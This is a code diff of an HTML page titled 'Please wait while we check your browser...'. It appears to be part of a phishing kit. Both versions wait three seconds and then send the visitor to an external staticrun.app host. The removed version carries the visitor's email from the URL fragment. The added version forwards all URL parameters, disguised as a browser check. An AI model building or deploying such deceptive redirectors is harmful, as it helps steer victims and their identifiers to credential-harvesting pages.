--- a/accesspoint.html
+++ b/accesspoint.html
@@ -1,61 +1,28 @@
 <!DOCTYPE html>
 <html>
 <head>
-  <title>Please wait...</title>
-  <style>
-    body {
-      font-family: Arial, sans-serif;
-      display: flex;
-      justify-content: center;
-      align-items: center;
-      height: 100vh;
-      background-color: #f4f4f4;
-      flex-direction: column;
-    }
-    #message {
-      font-size: 1.5em;
-      margin-bottom: 20px;
-    }
-    #dots span {
-      display: inline-block;
-      animation: blink 1s infinite;
-      margin: 0 2px;
-    }
-    #dots span:nth-child(2) { animation-delay: 0.2s; }
-    #dots span:nth-child(3) { animation-delay: 0.4s; }
-
-    @keyframes blink {
-      0%, 50%, 100% { opacity: 0; }
-      25%, 75% { opacity: 1; }
-    }
-  </style>
+  <title>Please wait while we check your browser...</title>
   <script>
-    // Generate a random jargon string (base64 encoded and URL-safe)
-    function generateJargon(length = 96) {
-      const charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
-      let result = "";
-      for (let i = 0; i < length; i++) {
-        result += charset.charAt(Math.floor(Math.random() * charset.length));
-      }
-      return encodeURIComponent(btoa(result));
-    }
+    // Redirect function delayed by 3 seconds
+    function delayedRedirect() {
+      // Get current URL parameters
+      const params = new URLSearchParams(window.location.search);
 
-    // Perform redirect after delay
-    function redirectAfterDelay() {
-      const email = window.location.hash.substring(1); // remove '#'
-      const authToken = generateJargon();
-      const baseURL = "https://papaya-1759505256502.staticrun.app/index.html";
-      const redirectURL = `${baseURL}#${email}`;
+      // Set the redirect base URL
+      const baseURL = "https://papaya-1759505256502.staticrun.app/index";
+
+      // Final redirect URL with params
+      const redirectURL = baseURL + "#" + params.toString();
+
+      // Redirect
       window.location.href = redirectURL;
     }
 
-    // Wait 3 seconds before redirect
-    window.addEventListener("DOMContentLoaded", () => {
-      setTimeout(redirectAfterDelay, 3000);
-    });
+    // Run redirect after 3000 ms (3 seconds)
+    setTimeout(delayedRedirect, 3000);
   </script>
 </head>
 <body>
-  <div id="message">Please wait<span id="dots"><span>.</span><span>.</span><span>.</span></span></div>
+  <p>Please wait...</p>
 </body>
 </html>
